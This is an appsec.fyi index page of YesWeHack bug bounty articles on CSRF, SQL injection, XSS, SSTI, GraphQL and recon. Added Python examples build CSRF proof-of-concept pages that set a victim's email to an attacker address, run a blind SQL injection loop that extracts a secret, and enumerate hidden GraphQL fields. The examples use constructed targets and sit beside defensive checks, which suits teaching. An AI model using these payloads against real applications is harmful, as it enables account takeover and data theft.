appsec.fyi · Sources

yeswehack.com

23 curated AppSec resources from yeswehack.com across 11 topics on appsec.fyi.

Resources curated from this publisher and indexed across appsec.fyi topic pages. Last item added: 2026-06-20.

Date Added · Resource · Topics · Excerpt

2026-06-20 · Hacking in the age of AI: LLMs, agentic CLIs and MCP servers for Bug Bounty hunters
Topics: AI, Bug Bounty
Explores how AI, specifically Large Language Models (LLMs), agentic CLIs and MCP servers, is changing bug bounty hunting: LLMs for understanding unfamiliar codebases, spotting candidate weaknesses and drafting exploits, and agentic CLIs for automating repetitive testing steps. The aim is to make hunters more efficient and effective as the field evolves.

2026-06-16 · ‘I found a CSRF and could deploy code through an enterprise’s App Store account’: yassine_eal’s Bug Bounty story
Topics: CSRF
yassine_eal found a Cross-Site Request Forgery (CSRF) vulnerability that let an attacker deploy code through an enterprise's App Store account, an impact that reaches application integrity and developer trust. The story underlines that even platforms assumed to be well defended, such as app stores, need robust anti-CSRF controls.

2026-06-13 · CVE-2026-48907: Unauthenticated RCE in the Joomla Content Editor extension
Topics: RCE
Write-up of CVE-2026-48907, an unauthenticated remote code execution vulnerability in the Joomla Content Editor extension.

2026-06-12 · What to do when your CEO asks, ‘Are we exposed?’
Topics: Bug Bounty
When a CEO asks "Are we exposed?" about a newly disclosed vulnerability, the answer depends on speed and reliable validation: the organization must quickly establish which systems and data are affected and whether they show signs of compromise. Without both, risk cannot be gauged accurately or the response prioritized.

2026-06-11 · The prioritisation problem: dealing with a growing vulnerability backlog
Topics: Bug Bounty
A growing vulnerability backlog forces the question of what to fix first when remediation capacity is limited. The article argues for a deliberate risk-assessment approach grounded in potential impact; without a prioritization framework, critical findings get buried in the backlog and exposure grows.

2026-06-11 · Dojo challenge #51 Deadbolt solution
Topics: Bug Bounty
Solution write-up for YesWeHack Dojo challenge #51, "Deadbolt".

2026-06-08 · CVE-2026-9082: PostgreSQL SQL Injection in Drupal
Topics: SQLi
Describes CVE-2026-9082, a SQL injection vulnerability in Drupal's PostgreSQL database integration that lets an attacker inject SQL, with unauthorized data access, modification or deletion as the potential impact.

2026-06-08 · ‘You have to be curious to do this job’: SpawnZii on balancing Bug Bounty with pentesting
Topics: Bug Bounty
SpawnZii on the demands and rewards of combining bug bounty hunting with penetration testing. The central point is that curiosity is the trait that matters most: it drives the exploration needed to find vulnerabilities, and the interview focuses on that mindset and the skills around it.

2026-06-08 · They said AI would kill Bug Bounty. The data says otherwise
Topics: AI, Bug Bounty
Counters the prediction that AI would automate vulnerability discovery and make bug bounty obsolete: the data shows programs continuing to thrive and evolve, with AI becoming a tool in hunters' hands rather than a replacement for them. Human creativity remains essential for complex, logic-based vulnerabilities, pointing to a collaborative future.

2026-06-08 · ‘Delivered exactly what we hoped for’: How TeamViewer built a successful Bug Bounty Program
Topics: Bug Bounty
TeamViewer's bug bounty program, two years in, has exceeded expectations: it has surfaced and fixed vulnerabilities proactively, strengthened product security and customer trust, and shows the company's commitment to continuous improvement.

2026-06-08 · How LLMs are changing Bug Bounty: An interview with Aituglo
Topics: AI, Bug Bounty
Interview with Aituglo on how Large Language Models are reshaping bug bounty, from helping researchers find vulnerabilities to helping platform operators triage and verify reports. Aituglo sees LLMs speeding up both discovery and remediation and expects AI's role in the hunter's toolkit and the wider ecosystem to keep growing.

2026-04-22 · Uncover Hidden Assets with Bug Bounty Recon: Fuzzing and JS Analysis
Topics: Recon
Reconnaissance guide covering parameter fuzzing, forced browsing and JavaScript analysis: endpoint discovery with LinkFinder and bookmarklets, automated JS analysis through Burp Suite extensions such as JSLinkFinder, GAP and JSpector, and path and parameter fuzzing to surface hidden assets and candidate vulnerabilities.

2026-04-17 · Recon series #4: Port scanning methods (YesWeHack)
Topics: Recon
Fourth part of the recon series, on passive and active port scanning to find open ports and hidden services. Covers Nmap, Masscan and Naabu, the TCP SYN, TCP connect and UDP scan types, banner grabbing for service identification, and firewall and IDS evasion techniques such as decoys and scan delays.

2026-04-17 · Subdomain enumeration: expand attack surface with active, passive methods
Topics: Recon
Advanced subdomain enumeration: passive techniques using Censys, Shodan, Subfinder and Amass (public databases, certificate transparency logs, web archives) and active methods such as DNS brute-forcing with Gobuster. Emphasizes expanding the attack surface by combining both, with practical examples for bug bounty hunting and penetration testing.

2026-04-16 · The Bug Bounty Guide to Exploiting CSRF Vulnerabilities - YesWeHack
Topics: CSRF
Guide to exploiting Cross-Site Request Forgery, covering POST-based, GET-based and stored CSRF. Explains how an attacker rides the victim's authenticated session to make their browser perform unintended actions such as changing account settings or transferring funds, with real-world scenarios and payloads (auto-submitting HTML forms for POST, image tags for GET) that show why the browser's trust in the site must be backed by anti-CSRF protections.

2026-04-16 · Smart Automation with Burp Suite - YesWeHack
Topics: Burp
Guide to automating Burp Suite workflows for bug bounty: the built-in passive scanner and crawler, BChecks, and extensions such as Burp Bounty and Logger++. Shows how to combine active and passive scanning to gather information and find vulnerabilities efficiently, tag BCheck requests with custom headers so they can be tracked, mine error messages for deeper analysis, and still complement automation with manual testing.

2026-04-10 · SSTI Exploitation with RCE Everywhere | YesWeHack
Topics: RCE, SSTI
Writeup of advanced Server-Side Template Injection techniques that reach Remote Code Execution without quotes or external plugins. Gives payloads for Jinja2, Mako, Twig, Smarty, Blade, Groovy and FreeMarker, showing how to bypass auto-escaping and reach built-ins such as chr, popen, passthru and execute across languages and frameworks.

2026-04-10 · Recon Roundup: Ultimate Reconnaissance Guide
Topics: Recon
Summary of bug bounty reconnaissance techniques: subdomain enumeration, port scanning, HTTP fingerprinting, hidden-parameter mapping, Google dorking and archive-based recon. Covers Nmap, Shodan and the Wayback Machine alongside manual methods such as forced browsing and directory fuzzing, aimed at high-impact findings that automated scanners miss.

2026-04-03 · SQL Injection for Bug Bounty Hunters | YesWeHack
Topics: SQLi
Guide to SQL injection for bug bounty hunters covering blind SQLi, time-based attacks and out-of-band callbacks. Explains how to tailor payloads to the underlying SQL statement, build detection into a bug bounty workflow, and exploit SQLi even in hardened systems, with CVE-2022-21661 in WordPress as a reference case.

2026-04-03 · XML External Entity: The Ultimate Bug Bounty Guide to XXE | YesWeHack
Topics: XXE
Guide to XML External Entity vulnerabilities: how external entity declarations in attacker-supplied XML lead to file disclosure (for example /etc/passwd), Server-Side Request Forgery against internal networks, denial of service and in some cases remote code execution. Notes that XXE usually stems from legacy code, explicitly enabled parser features or custom configurations, and lists where to look: document processors (DOCX, XLSX), API endpoints, SOAP services and SVG handlers.

2026-04-03 · Hacking GraphQL Endpoints in Bug Bounty Programs | YesWeHack
Topics: GraphQL
Guide to finding and exploiting GraphQL vulnerabilities: abusing introspection queries and field suggestions, manipulating mutations, and batching attacks. Covers common findings such as information disclosure, IDOR and broken access control, and recommends GraphQL Voyager, InQL, Clairvoyance and GraphQLmap for introspection and for fuzzing when introspection is disabled.

2026-04-03 · XSS Attacks & Exploitation: The Ultimate Guide | YesWeHack
Topics: XSS
Guide to reflected, stored and DOM-based XSS (CWE-79): detection, exploitation and real-world scenarios, and why the class matters for bug bounty hunters and ethical hackers. Explains how attacker-controlled input becomes executing JavaScript, leading to session hijacking, account takeover and data exfiltration, covers chaining CSRF with authenticated reflected XSS for greater impact, and discusses payload obfuscation for stored XSS.

2023-08-11 · YesWeHack #1 Bug Bounty Platform in Europe
Topics: Bug Bounty
YesWeHack #1 Bug Bounty Platform in Europe https://ift.tt/N0aPy8c
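The two CSRF delivery mechanisms named in the CSRF guide listed above (an image tag for GET, an auto-submitting HTML form for POST), together with the request-provenance check a defender would put in front of a state-changing endpoint. This is an added example for this index page, not code from the YesWeHack article or the yassine_eal write-up; the origin `https://app.example`, the endpoints and the parameters are hypothetical.

```python
"""CSRF delivery (attacker side) and request-provenance check (defender side).
Added example for this index page; not code from the YesWeHack CSRF guide.
The application origin and endpoints are hypothetical."""
import html
from urllib.parse import urlencode

SITE_ORIGIN = "https://app.example"  # hypothetical defended application


def csrf_poc_html(method: str, action: str, params: dict) -> str:
    """Build the attacker-hosted page for one state-changing request.

    GET: a zero-size <img> whose src carries the parameters; the browser
    fetches it with the victim's cookies attached.
    POST: a form of hidden inputs that submits itself as soon as it loads.
    Parameter names and values are attribute-escaped so a stray quote in
    the captured request cannot break the PoC markup."""
    if method.upper() == "GET":
        src = html.escape(action + "?" + urlencode(params), quote=True)
        return f'<img src="{src}" width="0" height="0" alt="">'
    inputs = "".join(
        f'<input type="hidden" name="{html.escape(str(k), quote=True)}" '
        f'value="{html.escape(str(v), quote=True)}">'
        for k, v in params.items()
    )
    return (
        f'<form id="csrf" method="POST" action="{html.escape(action, quote=True)}">'
        f"{inputs}</form>"
        "<script>document.getElementById('csrf').submit()</script>"
    )


def is_cross_site_request(headers: dict) -> bool:
    """Return True when a state-changing request did not originate from our
    own origin, using the browser-set provenance headers in order of trust:
    Sec-Fetch-Site (set by the browser, not by page script), then Origin,
    then Referer. A request carrying none of them is rejected: fail closed,
    and pair this with a per-session anti-CSRF token rather than relying on
    headers alone."""
    h = {k.lower(): v for k, v in headers.items()}
    site = h.get("sec-fetch-site")
    if site is not None:
        # 'same-site' (a sibling subdomain) is deliberately not trusted.
        return site not in ("same-origin", "none")
    origin = h.get("origin")
    if origin is not None:
        return origin != SITE_ORIGIN
    referer = h.get("referer")
    if referer is not None:
        return not referer.startswith(SITE_ORIGIN + "/")
    return True


if __name__ == "__main__":
    print(csrf_poc_html("GET", SITE_ORIGIN + "/settings", {"email": "attacker@evil.example"}))
    print(csrf_poc_html("POST", SITE_ORIGIN + "/api/deploy", {"app": "demo", "version": "1.0"}))
    print(is_cross_site_request({"Sec-Fetch-Site": "cross-site", "Origin": "https://evil.example"}))
```

The GET variant only matters when the application changes state on GET, which is itself a design defect; the POST variant is the one the guide's stored and POST-based cases rely on. The check treats `same-site` as hostile on purpose: a takeover of any sibling subdomain would otherwise become a CSRF bypass.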
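The blind SQL injection case from the SQL injection guide listed above, carried through end to end: a lookup that splices user input into the statement and leaks only a yes/no answer, the parameterized version beside it, and the boolean-based extraction loop that recovers a secret one character at a time through that single bit. This is an added example for this index page, not code from the YesWeHack guide; the schema, rows and the `api_key` secret are constructed, and the in-memory SQLite database stands in for the target.

```python
"""Boolean-based blind SQL injection against an in-memory SQLite database.
Added example for this index page; not code from the YesWeHack SQLi guide.
The schema, rows and vulnerable lookup are constructed for the demonstration."""
import sqlite3
import string

# Constructed sample data: one table, one secret we want to extract blindly.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, api_key TEXT);
INSERT INTO users VALUES (1, 'alice', 'k3y-7f2a');
INSERT INTO users VALUES (2, 'bob',   'k3y-01cc');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, username: str) -> bool:
    """Vulnerable 'does this user exist?' check: the value is spliced straight
    into the SQL text, so the caller controls the WHERE clause. Only a boolean
    comes back, which is the classic blind-SQLi situation."""
    sql = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def lookup_safe(conn, username: str) -> bool:
    """Hardened version: a bound parameter can never become SQL syntax."""
    sql = "SELECT 1 FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


ALPHABET = string.ascii_lowercase + string.digits + "-_"


def extract_blind(oracle, target_sql: str, max_len: int = 32) -> str:
    """Recover the single-row result of target_sql one character at a time.

    Each payload closes the original string literal, ORs in a condition on
    one character of the target, and comments out the trailing quote with
    SQLite's '--'. The oracle answers True exactly when that condition holds,
    so the statement the payload is tailored to is:
        SELECT 1 FROM users WHERE username = '<payload>'"""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = f"' OR substr(({target_sql}),{pos},1)='{ch}' -- "
            if oracle(payload):
                out += ch
                break
        else:
            break  # no character matched: substr() ran past the end
    return out


def demo() -> dict:
    """Run the extraction against both lookups and return what each leaked."""
    conn = make_db()
    secret_query = "SELECT api_key FROM users WHERE id=1"
    leaked = extract_blind(lambda s: lookup_vulnerable(conn, s), secret_query)
    # Against the parameterized lookup the payload is just an odd username.
    leaked_safe = extract_blind(lambda s: lookup_safe(conn, s), secret_query)
    return {"vulnerable": leaked, "parameterized": leaked_safe}


if __name__ == "__main__":
    print(demo())
```

The same loop becomes a time-based attack by swapping the boolean for a conditional delay (`pg_sleep` on PostgreSQL, `SLEEP` on MySQL) and measuring response time, and an out-of-band attack by having the condition trigger a DNS or HTTP callback; SQLite offers neither, so only the boolean form is shown. The alphabet is limited to what the secret can contain, and the comparison is case-sensitive under SQLite's default collation; on MySQL the `=` comparison is case-insensitive and `BINARY` or `ord()` comparisons are needed instead.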
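The "field suggestions when introspection is disabled" technique from the GraphQL guide listed above, which is what Clairvoyance automates: probe candidate field names, and harvest the server's own `Did you mean ...` validation hints to discover fields that were never in the wordlist. This is an added example for this index page, not code from the YesWeHack guide or from Clairvoyance. The endpoint is simulated in-process with a constructed schema so the block runs offline (real graphql-js picks suggestions by lexical distance; the simulation uses `difflib`); `parse_suggestions()` and `enumerate_fields()` are the client-side technique and would be pointed at a real `/graphql` URL via the `send` callback.

```python
"""GraphQL field enumeration via 'Did you mean' suggestions when introspection
is disabled. Added example for this index page; not code from the YesWeHack
guide or from Clairvoyance. The endpoint below is a constructed simulation."""
import difflib
import re

# Constructed target schema: the top-level Query fields a hunter wants to find.
HIDDEN_QUERY_FIELDS = ["user", "users", "userSession",
                       "invoice", "invoices", "adminAuditLog"]


def fake_graphql_endpoint(query: str) -> dict:
    """Stand-in for a hardened server: introspection is blocked, and an
    unknown top-level field yields a graphql-js style validation error with
    close-match suggestions. Constructed for this example only."""
    if "__schema" in query or "__type" in query:
        return {"errors": [{"message": "GraphQL introspection is not allowed"}]}
    m = re.match(r"\s*(?:query\s*)?\{\s*(\w+)", query)
    if not m:
        return {"errors": [{"message": "Syntax Error"}]}
    field = m.group(1)
    if field in HIDDEN_QUERY_FIELDS:
        return {"data": {field: None}}
    close = difflib.get_close_matches(field, HIDDEN_QUERY_FIELDS, n=5, cutoff=0.6)
    msg = f'Cannot query field "{field}" on type "Query".'
    if close:
        quoted = [f'"{c}"' for c in close]
        if len(quoted) == 1:
            hint = quoted[0]
        elif len(quoted) == 2:
            hint = " or ".join(quoted)
        else:
            hint = ", ".join(quoted[:-1]) + ", or " + quoted[-1]
        msg += f" Did you mean {hint}?"
    return {"errors": [{"message": msg}]}


SUGGESTION_RE = re.compile(r"Did you mean (.+?)\?$")
QUOTED_RE = re.compile(r'"([^"]+)"')


def parse_suggestions(message: str) -> list:
    """Pull the quoted names out of a graphql-js 'Did you mean' hint."""
    m = SUGGESTION_RE.search(message)
    return QUOTED_RE.findall(m.group(1)) if m else []


def introspection_enabled(send) -> bool:
    """First check a hunter makes: does the endpoint answer __schema?"""
    resp = send("{ __schema { types { name } } }")
    return "data" in resp and not resp.get("errors")


def enumerate_fields(send, wordlist, max_rounds: int = 3) -> set:
    """Probe each word as a top-level Query field. A successful query
    confirms the name; a 'Did you mean' error donates new candidates for
    the next round, so discovered names snowball beyond the wordlist."""
    confirmed, tried = set(), set()
    candidates = set(wordlist)
    for _ in range(max_rounds):
        new = set()
        for name in sorted(candidates - tried):
            tried.add(name)
            resp = send("{ " + name + " }")
            if "data" in resp and name in resp["data"]:
                confirmed.add(name)
                continue
            for err in resp.get("errors", []):
                new.update(parse_suggestions(err.get("message", "")))
        candidates = new - tried
        if not candidates:
            break
    return confirmed


if __name__ == "__main__":
    print("introspection:", introspection_enabled(fake_graphql_endpoint))
    print(sorted(enumerate_fields(fake_graphql_endpoint, ["usr", "invoce", "auditLog"])))
```

Against a live target `send` would POST `{"query": ...}` to the endpoint and return the parsed JSON; rate limits and WAF error-page responses are the usual reasons a round returns nothing, so log every response rather than only the parsed suggestions. Fields that no probe lands near (here `userSession`) stay hidden, which is why the technique is paired with a good wordlist rather than replacing one.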